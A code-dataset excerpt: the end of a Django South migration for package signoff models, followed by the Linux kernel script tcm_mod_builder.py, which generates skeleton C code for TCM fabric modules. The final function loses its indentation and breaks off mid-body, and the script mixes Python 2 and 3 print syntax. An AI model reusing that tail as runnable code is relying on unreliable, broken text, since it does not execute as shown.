'epoch': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pkgbase': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkgrel': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pkgver': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'repo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Repo']"}),
'revoked': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'package_signoffs'", 'to': "orm['auth.User']"})
},
'packages.signoffspecification': {
'Meta': {'object_name': 'SignoffSpecification'},
'arch': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Arch']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'epoch': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'known_bad': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'pkgbase': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkgrel': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pkgver': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'repo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Repo']"}),
'required': ('django.db.models.fields.PositiveIntegerField', [], {'default': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['packages']
|
fschaefer/android-samsung-3.0-jb | refs/heads/android-samsung-3.0-jb-mr0 | Documentation/target/tcm_mod_builder.py | 3119 | #!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
# Module-level state shared between the generator stages below.
tcm_dir = ""              # root of the kernel tree being scanned
fabric_ops = []           # function-pointer lines collected by tcm_mod_scan_fabric_ops()
fabric_mod_dir = ""       # output directory for the generated fabric module
fabric_mod_port = ""      # target-port prefix ("lport"/"tport"); set by the *_include builders
fabric_mod_init_port = "" # initiator-port prefix ("nport"/"iport"); set by the *_include builders
def tcm_mod_err(msg):
    """Print *msg* and abort the script with exit status 1.

    Fatal-error helper used by every generation stage.
    """
    # Single-argument print(...) behaves identically under Python 2
    # and Python 3; the original bare `print msg` is a SyntaxError on 3.
    print(msg)
    sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
    """Create the fabric module output directory if needed.

    Returns 1 when the directory already exists, None after creating it.
    A mkdir failure is fatal (reported via tcm_mod_err).
    """
    if os.path.isdir(fabric_mod_dir_var):
        return 1
    print("Creating fabric_mod_dir: " + fabric_mod_dir_var)
    # os.mkdir() returns None, so the original `ret = os.mkdir(...);
    # if ret:` error branch could never fire; catch the real failure
    # signal (OSError) instead.
    try:
        os.mkdir(fabric_mod_dir_var)
    except OSError:
        tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
    return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
    """Write <fabric_mod_name>_base.h with FC-flavoured nacl/tpg/lport structs.

    Side effects: sets module globals fabric_mod_port = "lport" and
    fabric_mod_init_port = "nport", which later stages use to name
    identifiers in the generated code.
    """
    global fabric_mod_port
    global fabric_mod_init_port
    buf = ""
    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
    print "Writing file: " + f
    p = open(f, 'w');
    # NOTE(review): open() raises on failure rather than returning a
    # falsy value, so this guard is effectively dead — presumably kept
    # for symmetry with the other builders.
    if not p:
        tcm_mod_err("Unable to open file: " + f)
    buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
    buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_nacl {\n"
    buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
    buf += " u64 nport_wwpn;\n"
    buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
    buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
    buf += " struct se_node_acl se_node_acl;\n"
    buf += "};\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_tpg {\n"
    buf += " /* FC lport target portal group tag for TCM */\n"
    buf += " u16 lport_tpgt;\n"
    buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
    buf += " struct " + fabric_mod_name + "_lport *lport;\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
    buf += " struct se_portal_group se_tpg;\n"
    buf += "};\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_lport {\n"
    buf += " /* SCSI protocol the lport is providing */\n"
    buf += " u8 lport_proto_id;\n"
    buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
    buf += " u64 lport_wwpn;\n"
    buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
    buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
    buf += " struct se_wwn lport_wwn;\n"
    buf += "};\n"
    ret = p.write(buf)
    # NOTE(review): file.write() returns None on Python 2, so this
    # error branch never fires — TODO confirm intended failure check.
    if ret:
        tcm_mod_err("Unable to write f: " + f)
    p.close()
    fabric_mod_port = "lport"
    fabric_mod_init_port = "nport"
    return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
    """Write <fabric_mod_name>_base.h with SAS-flavoured nacl/tpg/tport structs.

    Side effects: sets module globals fabric_mod_port = "tport" and
    fabric_mod_init_port = "iport" for the later generation stages.
    """
    global fabric_mod_port
    global fabric_mod_init_port
    buf = ""
    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
    print "Writing file: " + f
    p = open(f, 'w');
    if not p:
        tcm_mod_err("Unable to open file: " + f)
    buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
    buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_nacl {\n"
    buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
    buf += " u64 iport_wwpn;\n"
    buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
    buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
    buf += " struct se_node_acl se_node_acl;\n"
    buf += "};\n\n"
    buf += "struct " + fabric_mod_name + "_tpg {\n"
    buf += " /* SAS port target portal group tag for TCM */\n"
    buf += " u16 tport_tpgt;\n"
    buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
    buf += " struct " + fabric_mod_name + "_tport *tport;\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
    buf += " struct se_portal_group se_tpg;\n"
    buf += "};\n\n"
    buf += "struct " + fabric_mod_name + "_tport {\n"
    buf += " /* SCSI protocol the tport is providing */\n"
    buf += " u8 tport_proto_id;\n"
    buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
    buf += " u64 tport_wwpn;\n"
    buf += " /* ASCII formatted WWPN for SAS Target port */\n"
    buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
    buf += " struct se_wwn tport_wwn;\n"
    buf += "};\n"
    ret = p.write(buf)
    # NOTE(review): file.write() returns None on Python 2 — dead branch.
    if ret:
        tcm_mod_err("Unable to write f: " + f)
    p.close()
    fabric_mod_port = "tport"
    fabric_mod_init_port = "iport"
    return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
    """Write <fabric_mod_name>_base.h with iSCSI-flavoured nacl/tpg/tport structs.

    Unlike the FC/SAS variants, initiator and target names are plain
    ASCII strings (no binary WWPN fields). Side effects: sets module
    globals fabric_mod_port = "tport" and fabric_mod_init_port = "iport".
    """
    global fabric_mod_port
    global fabric_mod_init_port
    buf = ""
    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
    print "Writing file: " + f
    p = open(f, 'w');
    if not p:
        tcm_mod_err("Unable to open file: " + f)
    buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
    buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
    buf += "\n"
    buf += "struct " + fabric_mod_name + "_nacl {\n"
    buf += " /* ASCII formatted InitiatorName */\n"
    buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
    buf += " struct se_node_acl se_node_acl;\n"
    buf += "};\n\n"
    buf += "struct " + fabric_mod_name + "_tpg {\n"
    buf += " /* iSCSI target portal group tag for TCM */\n"
    buf += " u16 tport_tpgt;\n"
    buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
    buf += " struct " + fabric_mod_name + "_tport *tport;\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
    buf += " struct se_portal_group se_tpg;\n"
    buf += "};\n\n"
    buf += "struct " + fabric_mod_name + "_tport {\n"
    buf += " /* SCSI protocol the tport is providing */\n"
    buf += " u8 tport_proto_id;\n"
    buf += " /* ASCII formatted TargetName for IQN */\n"
    buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
    buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
    buf += " struct se_wwn tport_wwn;\n"
    buf += "};\n"
    ret = p.write(buf)
    # NOTE(review): file.write() returns None on Python 2 — dead branch.
    if ret:
        tcm_mod_err("Unable to write f: " + f)
    p.close()
    fabric_mod_port = "tport"
    fabric_mod_init_port = "iport"
    return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
    """Generate <fabric_mod_name>_base.h for the requested transport.

    Dispatches on proto_ident ("FC", "SAS" or "iSCSI"); any other value
    is fatal and terminates the script with exit status 1.
    """
    if proto_ident == "FC":
        tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
    elif proto_ident == "SAS":
        tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
    elif proto_ident == "iSCSI":
        tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
    else:
        # Single-argument print(...) is valid on both Python 2 and 3;
        # the original bare print statement is a SyntaxError on 3.
        print("Unsupported proto_ident: " + proto_ident)
        sys.exit(1)
    return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
    """Write <fabric_mod_name>_configfs.c: the configfs glue for the fabric.

    Emits make/drop callbacks for nodeacl, tpg and wwn objects, the
    target_core_fabric_ops table, and module init/exit plumbing.
    Depends on fabric_mod_port / fabric_mod_init_port having been set by
    a preceding tcm_mod_build_*_include() call.
    """
    buf = ""
    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
    print "Writing file: " + f
    p = open(f, 'w');
    if not p:
        tcm_mod_err("Unable to open file: " + f)
    # Header includes for the generated C file.
    buf = "#include <linux/module.h>\n"
    buf += "#include <linux/moduleparam.h>\n"
    buf += "#include <linux/version.h>\n"
    buf += "#include <generated/utsrelease.h>\n"
    buf += "#include <linux/utsname.h>\n"
    buf += "#include <linux/init.h>\n"
    buf += "#include <linux/slab.h>\n"
    buf += "#include <linux/kthread.h>\n"
    buf += "#include <linux/types.h>\n"
    buf += "#include <linux/string.h>\n"
    buf += "#include <linux/configfs.h>\n"
    buf += "#include <linux/ctype.h>\n"
    buf += "#include <asm/unaligned.h>\n\n"
    buf += "#include <target/target_core_base.h>\n"
    buf += "#include <target/target_core_transport.h>\n"
    buf += "#include <target/target_core_fabric_ops.h>\n"
    buf += "#include <target/target_core_fabric_configfs.h>\n"
    buf += "#include <target/target_core_fabric_lib.h>\n"
    buf += "#include <target/target_core_device.h>\n"
    buf += "#include <target/target_core_tpg.h>\n"
    buf += "#include <target/target_core_configfs.h>\n"
    buf += "#include <target/target_core_base.h>\n"
    buf += "#include <target/configfs_macros.h>\n\n"
    buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
    buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
    buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
    buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
    # make_nodeacl(): the FC/SAS variants carry a binary WWPN.
    buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
    buf += " struct se_portal_group *se_tpg,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
    buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " u64 wwpn = 0;\n"
    buf += " u32 nexus_depth;\n\n"
    buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
    buf += " return ERR_PTR(-EINVAL); */\n"
    buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
    buf += " if (!(se_nacl_new))\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
    buf += " nexus_depth = 1;\n"
    buf += " /*\n"
    buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
    buf += " * when converting a NodeACL from demo mode -> explict\n"
    buf += " */\n"
    buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
    buf += " name, nexus_depth);\n"
    buf += " if (IS_ERR(se_nacl)) {\n"
    buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
    buf += " return se_nacl;\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
    buf += " */\n"
    buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
        buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
    buf += " return se_nacl;\n"
    buf += "}\n\n"
    buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
    buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
    buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
    buf += " kfree(nacl);\n"
    buf += "}\n\n"
    # make_tpg()/drop_tpg(): portal group lifecycle.
    buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
    buf += " struct se_wwn *wwn,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
    buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
    buf += " unsigned long tpgt;\n"
    buf += " int ret;\n\n"
    buf += " if (strstr(name, \"tpgt_\") != name)\n"
    buf += " return ERR_PTR(-EINVAL);\n"
    buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
    buf += " return ERR_PTR(-EINVAL);\n\n"
    buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
    buf += " if (!(tpg)) {\n"
    buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += " }\n"
    buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
    buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
    buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
    buf += " &tpg->se_tpg, (void *)tpg,\n"
    buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
    buf += " if (ret < 0) {\n"
    buf += " kfree(tpg);\n"
    buf += " return NULL;\n"
    buf += " }\n"
    buf += " return &tpg->se_tpg;\n"
    buf += "}\n\n"
    buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
    buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
    buf += " core_tpg_deregister(se_tpg);\n"
    buf += " kfree(tpg);\n"
    buf += "}\n\n"
    # make_<port>()/drop_<port>(): wwn object lifecycle; port prefix
    # comes from the earlier *_include builder.
    buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
    buf += " struct target_fabric_configfs *tf,\n"
    buf += " struct config_group *group,\n"
    buf += " const char *name)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " u64 wwpn = 0;\n\n"
        buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
        buf += " return ERR_PTR(-EINVAL); */\n\n"
    buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
    buf += " if (!(" + fabric_mod_port + ")) {\n"
    buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
    buf += " return ERR_PTR(-ENOMEM);\n"
    buf += " }\n"
    if proto_ident == "FC" or proto_ident == "SAS":
        buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
        buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "__NAMELEN, wwpn); */\n\n"
    buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
    buf += "}\n\n"
    buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
    buf += "{\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
    buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
    buf += " kfree(" + fabric_mod_port + ");\n"
    buf += "}\n\n"
    # Version attribute shown under the fabric's configfs wwn directory.
    buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
    buf += " struct target_fabric_configfs *tf,\n"
    buf += " char *page)\n"
    buf += "{\n"
    buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
    buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
    buf += " utsname()->machine);\n"
    buf += "}\n\n"
    buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
    buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
    buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
    buf += " NULL,\n"
    buf += "};\n\n"
    # The fabric ops table: every callback points at a stub generated
    # into <fabric_mod_name>_fabric.c.
    buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
    buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
    buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
    buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
    buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
    buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
    buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
    buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
    buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
    buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
    buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
    buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
    buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
    buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
    buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
    buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
    buf += " .release_cmd_to_pool = " + fabric_mod_name + "_release_cmd,\n"
    buf += " .release_cmd_direct = " + fabric_mod_name + "_release_cmd,\n"
    buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
    buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
    buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
    buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
    buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
    buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
    buf += " .sess_get_initiator_sid = NULL,\n"
    buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
    buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
    buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
    buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
    buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
    buf += " .new_cmd_failure = " + fabric_mod_name + "_new_cmd_failure,\n"
    buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
    buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
    buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
    buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
    buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
    buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
    buf += " .pack_lun = " + fabric_mod_name + "_pack_lun,\n"
    buf += " /*\n"
    buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
    buf += " */\n"
    buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
    buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
    buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
    buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
    buf += " .fabric_post_link = NULL,\n"
    buf += " .fabric_pre_unlink = NULL,\n"
    buf += " .fabric_make_np = NULL,\n"
    buf += " .fabric_drop_np = NULL,\n"
    buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
    buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
    buf += "};\n\n"
    # register/deregister with the TCM configfs infrastructure.
    buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
    buf += "{\n"
    buf += " struct target_fabric_configfs *fabric;\n"
    buf += " int ret;\n\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
    buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
    buf += " utsname()->machine);\n"
    buf += " /*\n"
    buf += " * Register the top level struct config_item_type with TCM core\n"
    buf += " */\n"
    buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
    buf += " if (!(fabric)) {\n"
    buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
    buf += " return -ENOMEM;\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
    buf += " */\n"
    buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
    buf += " /*\n"
    buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
    buf += " */\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
    buf += " /*\n"
    buf += " * Register the fabric for use within TCM\n"
    buf += " */\n"
    buf += " ret = target_fabric_configfs_register(fabric);\n"
    buf += " if (ret < 0) {\n"
    buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
    buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
    buf += " return ret;\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Setup our local pointer to *fabric\n"
    buf += " */\n"
    buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
    buf += " return 0;\n"
    buf += "};\n\n"
    buf += "static void " + fabric_mod_name + "_deregister_configfs(void)\n"
    buf += "{\n"
    buf += " if (!(" + fabric_mod_name + "_fabric_configfs))\n"
    buf += " return;\n\n"
    buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
    buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
    buf += "};\n\n"
    # Module init/exit entry points.
    buf += "static int __init " + fabric_mod_name + "_init(void)\n"
    buf += "{\n"
    buf += " int ret;\n\n"
    buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
    buf += " if (ret < 0)\n"
    buf += " return ret;\n\n"
    buf += " return 0;\n"
    buf += "};\n\n"
    buf += "static void " + fabric_mod_name + "_exit(void)\n"
    buf += "{\n"
    buf += " " + fabric_mod_name + "_deregister_configfs();\n"
    buf += "};\n\n"
    buf += "#ifdef MODULE\n"
    buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
    buf += "MODULE_LICENSE(\"GPL\");\n"
    buf += "module_init(" + fabric_mod_name + "_init);\n"
    buf += "module_exit(" + fabric_mod_name + "_exit);\n"
    buf += "#endif\n"
    ret = p.write(buf)
    # NOTE(review): file.write() returns None on Python 2 — dead branch.
    if ret:
        tcm_mod_err("Unable to write f: " + f)
    p.close()
    return
def tcm_mod_scan_fabric_ops(tcm_dir):
    """Populate the module-level ``fabric_ops`` list from the TCM header.

    Reads include/target/target_core_fabric_ops.h under *tcm_dir* and
    appends (rstripped) every line that contains a function-pointer
    declaration, i.e. matches '(*'.  The results feed
    tcm_mod_dump_fabric_ops().
    """
    fabric_ops_api = tcm_dir + "include/target/target_core_fabric_ops.h"
    print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
    process_fo = 0;
    p = open(fabric_ops_api, 'r')
    line = p.readline()
    while line:
        # Phase 0: skip ahead past the 'struct target_core_fabric_ops {'
        # header line itself before scanning begins.
        if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
            line = p.readline()
            continue
        if process_fo == 0:
            # First non-header line: switch to scanning mode and advance.
            process_fo = 1;
            line = p.readline()
            # Search for function pointer
            if not re.search('\(\*', line):
                continue
            fabric_ops.append(line.rstrip())
            continue
        # Phase 1: every subsequent line is checked the same way.
        line = p.readline()
        # Search for function pointer
        if not re.search('\(\*', line):
            continue
        fabric_ops.append(line.rstrip())
    p.close()
    return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
